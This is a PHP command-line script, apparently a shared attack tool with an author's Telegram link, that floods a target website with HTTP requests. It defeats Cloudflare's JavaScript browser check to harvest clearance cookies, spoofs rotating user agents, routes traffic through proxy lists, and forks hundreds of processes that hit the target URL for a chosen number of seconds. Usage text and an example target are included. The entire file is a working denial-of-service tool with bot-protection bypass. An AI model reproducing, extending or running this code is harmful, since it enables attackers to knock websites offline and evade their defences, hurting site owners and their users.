<?php
error_reporting(E_ERROR);
//color class just to make it nice [not mine]
class Colors {
private $foreground_colors = array();
private $background_colors = array();
public function __construct() {
$this->foreground_colors['black'] = '0;30';
$this->foreground_colors['dark_gray'] = '1;30';
$this->foreground_colors['blue'] = '0;34';
$this->foreground_colors['light_blue'] = '1;34';
$this->foreground_colors['green'] = '0;32';
$this->foreground_colors['light_green'] = '1;32';
$this->foreground_colors['cyan'] = '0;36';
$this->foreground_colors['light_cyan'] = '1;36';
$this->foreground_colors['red'] = '0;31';
$this->foreground_colors['light_red'] = '1;31';
$this->foreground_colors['purple'] = '0;35';
$this->foreground_colors['light_purple'] = '1;35';
$this->foreground_colors['brown'] = '0;33';
$this->foreground_colors['yellow'] = '1;33';
$this->foreground_colors['light_gray'] = '0;37';
$this->foreground_colors['white'] = '1;37';
$this->background_colors['black'] = '40';
$this->background_colors['red'] = '41';
$this->background_colors['green'] = '42';
$this->background_colors['yellow'] = '43';
$this->background_colors['blue'] = '44';
$this->background_colors['magenta'] = '45';
$this->background_colors['cyan'] = '46';
$this->background_colors['light_gray'] = '47';
}
public function getColoredString($string, $foreground_color = null, $background_color = null) {
$colored_string = "";
if (isset($this->foreground_colors[$foreground_color])) {
$colored_string .= "\033[" . $this->foreground_colors[$foreground_color] . "m";
}
if (isset($this->background_colors[$background_color])) {
$colored_string .= "\033[" . $this->background_colors[$background_color] . "m";
}
$colored_string .= $string . "\033[0m";
return $colored_string;
}
public function getForegroundColors() {
return array_keys($this->foreground_colors);
}
public function getBackgroundColors() {
return array_keys($this->background_colors);
}
}
$colors = new Colors();
$temp_name = time() . "_" . rand(1000, 9999);
//user agents
$uas = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
"Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
"Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
"Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",];
//cf class
class CFBypass {
private $html;
private $url;
function __construct($url, $html) {
$this->url = parse_url($url);
$this->html = $html;
}
//get how many time it has to wait
function getTimeout() {
if(preg_match('/}, (\d+)\);/', $this->html, $matches) !== 1)
return false;
return $matches[1];
}
//solve the challenge
function sJrs() {
if(!$this->isok())
return false;
$query = [];
if(preg_match('/name="jschl_vc" value="([^"]+)"/', $this->html, $matches) !== 1)
return false;
$query['jschl_vc'] = $matches[1];
if(preg_match('/name="pass" value="([^"]+)"/', $this->html, $matches) !== 1)
return false;
$query['pass'] = $matches[1];
$query['jschl_answer'] = $this->sJc();
return $query['jschl_answer']
? $this->url['scheme'] . '://' . $this->url['host'] . '/cdn-cgi/l/chk_jschl?' . http_build_query($query)
: false;
}
//check if the cookies are ok
function isok() {
return strpos($this->html, '/cdn-cgi/l/chk_jschl') !== false
&& strpos($this->html, 'challenge-form') !== false
&& strpos($this->html, 'jschl_vc') !== false
&& strpos($this->html, 'jschl_answer') !== false;
}
function sJc() {
if(preg_match('/{"\w+":([^}]+)};/', $this->html, $matches) !== 1)
return false;
$challenge = self::dJs($matches[1]);
if(preg_match_all('/([+\-*])=([^;]+);/', $this->html, $matches, PREG_SET_ORDER) == 0)
return false;
foreach($matches as $match) {
$op = $match[1];
$number = self::dJs($match[2]);
if(!self::mathExec($challenge, $number, $op))
return false;
}
return $challenge + strlen($this->url['host']);
}
private static function dJs($jsInt) {
if(preg_match('/^\+\(\(?([^);]+)\)\+\(([^);]+)\)\)$/', $jsInt, $matches) === 1) {
return self::dJs($matches[1])*10 + self::dJs($matches[2]);
} else {
return substr_count($jsInt, '!![]') + substr_count($jsInt, '!+[]');
}
}
private static function mathExec(&$a, $b, $op) {
switch($op) {
case '+': $a += $b; return true;
case '-': $a -= $b; return true;
case '*': $a *= $b; return true;
case '/': $a /= $b; return true;
case '%': $a %= $b; return true;
}
return false;
}
}
$host = $argv[1]; //website target
$proxy = $argv[5]; // proxy file (optional)
$cookies_c = 0;
$threads_in = $argv[2];// how many threads
$whandlers = $argv[4]; // how many cookies to generate (if proxies are set, the number of cookies will be the same of the proxies)
//max timeout for the proxy validation
$timeout = 2;
if($proxy != null){
$proxies = explode("\n", file_get_contents($proxy));
$whandlers = max(array_keys($proxies));
}
echo $colors->getColoredString("Made By Andrew\nTelegram: https://t.me/Vaiiry\n", "light_red", null) . "\n";
if(!isset($argv[1]) || !isset($argv[2]) || !isset($argv[3]) || !isset($argv[4])){
echo $colors->getColoredString("Usage: php " . $argv[0] . " [URL] [THREADS] [SECONDS] [CLIENTS_NUMBER] [PROXY_FILE]", "light_green", null) . "\n";
echo $colors->getColoredString("Example: php " . $argv[0] . " http://blunter.xyz/ 800 60 20 proxies.txt", "light_green", null) . "\n";
die();
}
echo $colors->getColoredString("Warning: Using proxies the attack can be slower!", "yellow", "black") . "\n";
function Delete($path)
{
if (is_dir($path) === true)
{
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::CHILD_FIRST);
foreach ($files as $file)
{
if (in_array($file->getBasename(), array('.', '..')) !== true)
{
if ($file->isDir() === true)
{
rmdir($file->getPathName());
}
else if (($file->isFile() === true) || ($file->isLink() === true))
{
unlink($file->getPathname());
}
}
}
return rmdir($path);
}
else if ((is_file($path) === true) || (is_link($path) === true))
{
return unlink($path);
}
return false;
}
//get a session with given useragent proxy ready and returns the cookies
function prepare($url, $ua, $proxy, $pid){
global $timeout;
global $colors;
global $argv;
if($argv[5] != null){
if($proxy == ""){
return null;
}
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_PROXY, $proxy);
$result = curl_exec($ch);
if(strpos($result, 'Checking your browser before accessing') === false && $result !== false){
if($proxy != NULL){
$proxy_text = " | PROXY: $proxy";
}
var_dump($result);
echo $colors->getColoredString('Initializing Cookies #' . $pid . $proxy_text . "\n", "light_red", null) . "\n";
preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $result, $matches);
$cookiess = array('nothing' => 'nada');
return $cookiess;
}
$cf = new CFBypass($url, $result);
if($cf->isok()) {
if($proxy != NULL){
$proxy_text = " | PROXY: $proxy";
}
echo $colors->getColoredString('Initializing Cookies #' . $pid . $proxy_text . "\n", "light_red", null) . "\n";
usleep($cf->getTimeout() * 1000);
curl_setopt($ch, CURLOPT_URL, $cf->sJrs());
$result = curl_exec($ch);
preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $result, $matches);
$cookies = array();
foreach($matches[1] as $item) {
parse_str($item, $cookie);
$cookies = array_merge($cookies, $cookie);
}
}
curl_close($ch);
return $cookies;
}
//the attack function
function attack($host, $threads, $end){
global $argv;
$end = time() + $argv[3];
global $handlers;
for($i = 0; $i < $threads; $i ++){
$pid = pcntl_fork();
if($pid == -1) {
echo "Something went wrongs.\n";
exit();
} elseif($pid) {
continue;
} else {
while($end > time()) {
$flood = curl_init();
$handler = $handlers[array_rand($handlers)];
$cookies = $handler['cookies'];
$ua = $handler['ua'];
$cfduid = $cookies['__cfduid'];
$clear = $cookies["cf_clearance"];
$cstr = "__cfduid=$cfduid; cf_clearance=$clear;";
$proxy = $handler['proxy'];
//echo "IM USING $proxy\n";
curl_setopt($flood, CURLOPT_URL, $host);
curl_setopt($flood, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($flood, CURLOPT_USERAGENT, $ua);
curl_setopt($flood, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($flood, CURLOPT_PROXY, $proxy);
curl_setopt($flood, CURLOPT_COOKIE, $cstr);
$var123 = curl_exec($flood);
curl_close($flood);
}
die();
}
}
for($j = 0; $j < $threads; $j++) {
$pid = pcntl_wait($status);
}
}
//save the handler to file to read it later bc the subprocess cant read the same variables
function writeHandler($handler){
global $temp_name;
if(!file_exists($temp_name)){
mkdir($temp_name);
}
$json = json_encode($handler);
$hash = md5($json);
$fo = fopen($temp_name . "/" . $hash . ".handler", "w");
fwrite($fo, $json);
fclose($fo);
}
//read them
function readHandlers(){
global $temp_name;
if(!file_exists($temp_name)){
return NULL;
}
$handlers = scandir($temp_name . "/");
foreach($handlers as $handler)
{
if(is_file($temp_name . "/" .$handler)){
$handlers_array[] = json_decode(file_get_contents($temp_name . "/" .$handler), true);
}
}
return $handlers_array;
}
//initialize
for ($i = 1; $i <= $whandlers; ++$i) {
$pid = pcntl_fork();
$ua = $uas[array_rand($uas)];
if (!$pid) {
$cookies = prepare($host, $ua, $proxies[$i], $i);
if($cookies != NULL){
$handler = array('cookies' => $cookies, 'ua' => $ua, 'proxy' => $proxies[$i]);
//var_dump($cookies);
writeHandler($handler);
}
exit($i);
}
}
//wait all process getting ready
while (pcntl_waitpid(0, $status) != -1) {
$status = pcntl_wexitstatus($status);
}
$handlers = readHandlers();
Delete($temp_name . "/");
//var_dump($handlers);
//start the attack
echo $colors->getColoredString("Attack started!", "light_green", null) . "\n";
attack($host, $threads_in);
?>
preferences:
41.4 ms | 402 KiB | 5 Q